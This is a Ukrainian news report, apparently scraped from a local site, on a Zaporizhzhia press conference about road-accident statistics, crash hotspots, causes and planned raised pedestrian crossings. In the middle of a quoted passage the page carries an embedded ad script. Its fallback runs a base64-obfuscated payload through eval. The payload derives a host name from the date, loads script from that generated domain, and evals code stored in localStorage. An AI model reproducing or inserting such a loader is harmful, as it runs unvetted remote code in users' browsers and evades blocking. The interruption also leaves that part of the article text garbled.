Де найчастіше трапляються ДТП та як зміняться дороги у Запоріжжі: репортаж з пресконференції (ФОТО, ВІДЕО)

За час повномасштабного вторгнення ситуація з безпекою пішоходів та ДТП у Запоріжжі не змінилася: зараз порушують низку питань щодо розвитку безпеки дорожнього руху у місті, з’являються підвищені пішоходні переходи.

Кореспондент Акцента побував на пресконференції щодо статистики ДТП. Про те, яка наразі ситуація з кількістю автопригод і де у місті вони регулярно трапляються, як зміняться дороги Запоріжжя та де з’являться нові підвищені переходи — читайте в нашому репортажі.

Пресконференція щодо статистики ДТП у Запоріжжі: про що вона була

У четвер, 13 липня, у Туристичному інформаційному центрі міста Запоріжжя відбулася пресконференція з приводу статистики ДТП у Запоріжжі: у цьому заході взяли участь представники Патрульної поліції і громадськості та директор департаменту муніципального управління міськради.

«Громадська організація Спільно HUB запрошує журналістів до висвітлення пресконференції присвяченої шляхам підвищення безпеки для всіх учасників дорожнього руху, які спираються на аналітичні дані щодо ДТП у Запоріжжі, яка відбудеться у Туристичному інформаційному центрі», — написали раніше в пресанонсі на сайті громадської організації.

Загалом, на конференції відбулося обговорення методів підвищення безпеки дорожнього руху для зменшення ДТП. Зокрема, там розповідали про напрацювання в цій сфері, про рекомендації, які можуть бути при цьому.

«Коли в Україні після 24 лютого 2022 року щоденно вмирає або травмується цивільне населення від дій окупантів, ми не маємо права втрачати здоров’я та життя людей на дорогах міста. Адже здоров’я та життя людей це найбільша цінність. Ми, як Громадська організація Спільно HUB, хочемо привернути увагу до важливості підвищення безпеки дорожнього руху в Запоріжжі та аргументувати, чому питання безпеки на дорогах зараз «на часі», — йдеться в описі події на сайті ГО.

Так, представник громадської організації Спільно HUB Павло Воскобойніков, керівник та координатор напрямку сталої мобільності, продемонстрував підготовлену презентацію рекомендацій щодо змін організації дорожнього руху по місцях концентрації ДТП, на основі статистики ДТП.

«Громадська організація Спільно HUB працює вже вісім років. (…) Під час повномасштабного вторгнення ми підтримували критичну інфраструктуру, ДСНС, поліцію, центр крові. Знову ж таки, в 2023 році тема інфраструктури трошки переросла в більшу тему — безпеку дорожнього руху, яка на даний момент є доволі актуальною та включає в себе, в тому числі, розвиток велоінфраструктури, тому на початку цього року ми запросили у Патрульної поліції інформацію щодо ДТП і зробили з неї невеличку статистику та висновки», — зазначив представник ГО.

Павло Воскобойніков, керівник та координатор напрямку сталої мобільності громадської організації Спільно HUB. Фото: Акцент. Чи на часі дорожня інфраструктура: статистика ДТП за три роки у Запоріжжі

Згідно з даними, які були оприлюднені в ході демонстрації презентації в рамках конференції, через дорожньо-транспортні пригоди в обласному центрі загинуло:

2020 рік — 58 осіб;2021 рік — 40 осіб;2022 рік — 29 осіб.

Що стосується травм різного ступеню тяжкості, то була наведена наступна статистична інформація на основі даних Патрульної поліції:

2020 рік — 761 особа;2021 рік — 769 особа;2022 рік — 561 особа.

Так, наведеними цифрами керівник та координатор напрямку сталої мобільності обумовив важливість розвитку безпеки дорожнього руху.

«На дорогах гине дуже багато людей, а ще більше отримує поранення — тяжкі або легкі, але ці особи на якийсь час випадають з життя, з суспільства, вони не можуть заробляти. (…) Сьогодні подивився статистику, знову ж таки, по повномасштабному вторгненню, так от за рік — з 24 лютого 2022 року по 24 лютого 2023-го — загинуло від повномасштабного вторгнення 344 людини в Запоріжжі, а 939 з них — поранено. Як бачимо, по пораненням ці цифри теж можна навіть співставити, а враховуючи, що повномасштабне вторгнення зараз півтора року, то ситуація на дорогах триває вже дуже давно більше десяти років, коли кількість автомобілів (…) — учасників дорожнього руху почала стрімко зростати», — зазначив він.

За словами Павла Воскобойнікова, ця тема зараз є «доцільною, важливою»:

«Ми не маємо під час повномасштабного вторгнення втрачати життя і здоров’я людей ще і за рахунок доріг. Ми вважаємо, що треба робити їх безпечнішими вже прямо зараз — хоча б починати робити якісь певні кроки», — підкреслив він.

У презентації виокремили основні причини ДТП у більшості випадках. До них віднесли такі:

перевищення безпечної та встановленої швидкості руху;порушення правил маневрування;порушення правил проїзду перехресть;недотримання дистанції.порушення правил проїзду пішохідних переходів;керування транспортним засобом у нетверезому стані;перехід у невстановленому місці;виїзд на зустрічну смугу;неочікуваний виїзд на проїжджу частину;невиконання вимог сигналів регулювання. Основні причини ДТП у 2020 році, інфографіка. Фото: Акцент.

Загалом, безпека пішоходів у Запоріжжі під час війни не змінилася — у відсотковому співвідношенні наведено наступну статистику ДТП за участі пішоходів:

2020 рік — 42,2%;2021 рік — 43,5%;2022 рік — 43,37%. Статистичні дані щодо кількості ДТП за участі пішоходів за 2020-2022 роки, інфографіка. Фото: Акцент.

Загалом, пішоходи є вразливими учасниками дорожнього руху. Як наголосив представник ГО, будь-яке ДТП з пішоходами «вже майже завжди має за собою тяжкі наслідки для пішохода і це вже наврядчи може відбутися з одними синцями та забоями»: var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

«Частіше це вже якісь переломи тощо. Тому, як бачимо, ситуація з пішоходами не змінюється — протягом минулих років. (…) Причини ДТП, на даний момент, постійно змінюються, основна причина — це порушення правил маневрування, порушення правил проїзду пішохідних переходів і порушення правил проїзду перехресть. «.

Дороги Запоріжжя: де найчастіше трапляються ДТП та 2 нових підвищених пішоходних переходи у місті

На конференції були озвучені ділянки на дорогах Запоріжжя, де регулярно трапляються дорожньо-транспортні пригоди (у тому числі за участю пішоходів. Згідно з даними, наведеними у презентації, до них відносяться, зокрема, наступні локації:

вул. Бородинська (від вулиці Гребельної до вул. Ладозька) — протягом трьох років сталося 19 ДТП з постраждалими, з них 13 за участю пішоходів;вул. Гребельна (від вул. Бородинська до Греблі ДніпроГЕС) — протягом 2020-2022 років — 17 ДТП з постраждалими, з них 8 — за участі пішоходів;вул. Новокузнецька (від Прибережної магістралі до вул. Нагнибіди) — за три роки сталось 16 ДТП з постраждалими, 10 з них — за участі пішоходів.вул. Українська (від Прибережної магістралі до вул. Паровозна) — за останні три роки сталось 38 ДТП з постраждалими, 20 з них — за участі пішоходів;проспект Соборний по всій протяжності — протягом трьох останніх років сталося 185 ДТП з постраждалими, з них — 91 за участі пішоходів.

«Це не виключення, не вичерпний якийсь список — у нас дуже багато місць, перехресть, де стаються ці аварії, тому треба максимально з цим (безпекою дорожнього руху — ред.) працювати», — підсумував Воскобойніков.

Фото: Акцент.

Також, у СпільноHUB підготували рекомендації підготовлені з урахуванням норм ДСТУ 4123:2020 «Безпека дорожнього руху. Засоби заспокоєння руху». Заходи з облаштування засобів заспокоєння дорожнього руху рекомендують застосовувати:

у місцях з інтенсивним рухом транспортних засобів у житлових зонах та прилеглих до дороги територіях;на ділянках доріг та вулиць поблизу місць масового скупчення людей, наприклад, навчальних закладів, торгівельних центрів, торгових площ, розважальних закладів (стадіони, кінотеатри, театри тощо), місць масового відпочинку (парки, дитячі майданчики, зони відпочинку тощо), лікувальних закладів, оздоровчих закладів та великих підприємств;на ділянках доріг та вулиць з рухом пішоходів інтенсивністю не менше ніж 150 осіб за годину в одному напрямку згідно з 7.10 ДСТУ 4092;на ділянках доріг та вулиць з особливими умовами землекористування (історичні, туристичні, торгівельні, громадські, адміністративні тощо);на ділянках доріг на підходах до населених пунктів.

Як зазначив Артем Фурманов, начальник відділу безпеки дорожнього руху Національної поліції, першочергова задача — це
«зменшення швидкості в місті за рахунок тих самих підвищених пішоходних переходів», бо швидкість є найбільш поширеною причиною травмувань пішоходів.

«Безпека та життя людей для нас — на першому місці. Ми зараз подивилися з вами місця, ці картинки, але якщо ми будемо більш детально це розглядати, то ми будемо розуміти, що там була кров людей. Треба щось змінювати та щось робити. Якщо ми будемо розглядати причини ДТП, то найперше в нас йде маневрування, але якщи аналізувати, у нас швидкість на другому місці, але якщо по травмам — то вона є на першому місці. (…) Тому, першочергове, що ми пропонуємо — це зменшення швидкості в місті за рахунок тих самих підвищених пішоходних переходів», — сказав він.

Артем Фурманов, начальник відділу безпеки дорожнього руху Національної поліції. Фото: Акцент.

За словами Віталія Лисенко, директора Департаменту муніципального управління Запорізької міськради, у якому безпосередньо відповідають за безпеку дорожнього рух, ремонтом та утримання доріг міста, наразі у місті втановлено два нових підвищених пішоходних переходів — на Прибережній магістралі та навпроти Автовокзалу (дивитися фото нижче). Втім, планується встановлення таких переходів на ще 11 проблених ділянках на дорогах міста, де пішоходні переходи є не регульованими.

Віталій Лисенко, директор Департаменту муніципального управління Запорізької міськради. Фото: Акцент.

«(…) Міська рада експерементально почала дивитися та реалізовувати практику саме з підвищеними пішоходними переходами. Наразі у нас дві схеми дорожнього руху були перероблені та туди були внесені ці два (переходи — ред.) — на Правобережній магістралі (…). Другий такий об’єкт, на якому була повністю нова схема реалізована — це перехрестя навпроти Автовокзалу на проспекті Соборному (…) Наразі ми працюємо на ще 11 локаціях: це ті локації, на яких була найбільша кількість аварій саме за участю пішоходів. І це ті локації, які не мають регульованого пішоходного переходу, відсутні будь-які засоби заспокоєння дорожного руху (…)».

Перший підвищений пішоходний перехід на Правобережній магістралі біля супермаркету АТБ. Фото: Акцент. Другий підвищений пішоходний перехід на перехресті навпроти Автовокзалу на проспекті Соборному. Фото: Акцент.

Загалом, як зазначають у СпільноHUB, орієнтовний бюджет (в залежності від кількості смуг та ширини проїзної частини) складає: для проїзної частини із 2-ма смугами руху – близько 60-70 тис. грн, а з 4-ма смугами – 120-140 тис.грн.

У коментарі журналістам директор Департаменту наголосив, що програми про безпеку дорожнього руху «ніколи не було, ніколи не розглядалися схеми організації дорожнього руху». Наразі проводиться розробка відповідних програм.

«Ці два підвищених пішоходних переходи зроблені вперше. Ми бачимо, яка ефективність в них є. (…) Зараз бачимо однозначно позитивні результати (…) — меншою швидкість (автомобілів — ред.) стала і водії почали звертати увагу, і швидкість знижувати», — підкреслив він.

Лисенко також назвав ділянки дороги у Запоріжжі, де ще планують встановити в майбутньому підвищені пішоходні переходи:

проспект Соборний, 212 (в районі шахматного клубу);проспект Соборний, 131-133 (в районі центральної оптики);проспект Соборний, 174-176;в районі між вулицею Каховською та бульваром Вінтера;на одній з ділянок на Хортицькому шосе;на одній з ділянок по вулиці Новокузнецькій;на одній з ділянок по вулиці Бородинській;проспект Соборний, 234 (біля площи Запорізької).

Нижче можна побачити відео з пресконференції з приводу статистики ДТП у Запоріжжі.

Виступ спікера під час пресконференції. Фото: Акцент.

Тематичне фото — Акцент. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/de-najchastishe-traplyayutsya-dtp-ta-yak-zminyatsya-dorogi-u-zaporizhzhi-reportazh-z-preskonferentsiyi-foto-video/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top